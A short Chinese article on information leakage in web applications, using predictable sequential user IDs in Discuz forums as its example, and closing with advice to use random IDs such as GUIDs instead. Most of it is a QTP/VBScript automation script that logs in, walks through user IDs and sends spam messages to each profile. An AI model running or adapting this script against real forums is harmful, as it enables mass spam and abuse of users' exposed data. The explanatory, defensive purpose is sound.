关于信息泄漏的利用

WEB应用程序由于放在网络上，很容易被访问，一些安全信息也很容易暴露，例如用户数据、服务器信息等，这些泄漏的信息有些可以直接被使用，例如用户的帐号信息，有些可以被间接地利用，例如Discuz论坛对于用户资料的访问，由于用户ID是可预见的，例如：

http://bbs.XXX.com/space.php?action=viewpro&uid=10000

这里uid是可预见的，按注册顺序递增上去。

恶意用户可以利用这些信息，例如想群发信息给论坛用户，可以用类似如下的脚本：

SystemUtil.Run "iexplore" , "http://bbs.XXX.com/"

Browser("XXX").Navigate  "http://bbs.XXX.com/"

Browser("XXX").Page("XXX").Link("登录").Click
Browser("XXX").Page("XXX").WebEdit("username").Set "user1"
Browser("XXX").Page("XXX").WebEdit("password").Set "userpasswd"
Browser("XXX").Page("XXX").WebButton("登录").Click

uid = 10000
On Error Resume Next
For I = 0 to 10
 uid = uid + 1
 Browser("XXX").Navigate "http://bbs.XXX.com/space.php?action=viewpro&uid=" & uid
 Browser("XXX").Page("XXX").Link("发短消息").Click
 Browser("XXX").Page("XXX").WebEdit("message").Click
 Browser("XXX").Page("XXX").WebEdit("message").Set "垃圾信息！"
 Browser("XXX").Page("XXX").WebButton("发送").Click
 Wait 15
Next

Browser("XXX").Page("XXX").Link("退出").Click

SystemUtil.CloseProcessByName "iexplore"

如果Discuz论坛对于用户ID号的设计做一些更改，不使用可预见的ID（顺序注册），而是使用随机号（例如GUID），那么被利用的可能性就大大降低了。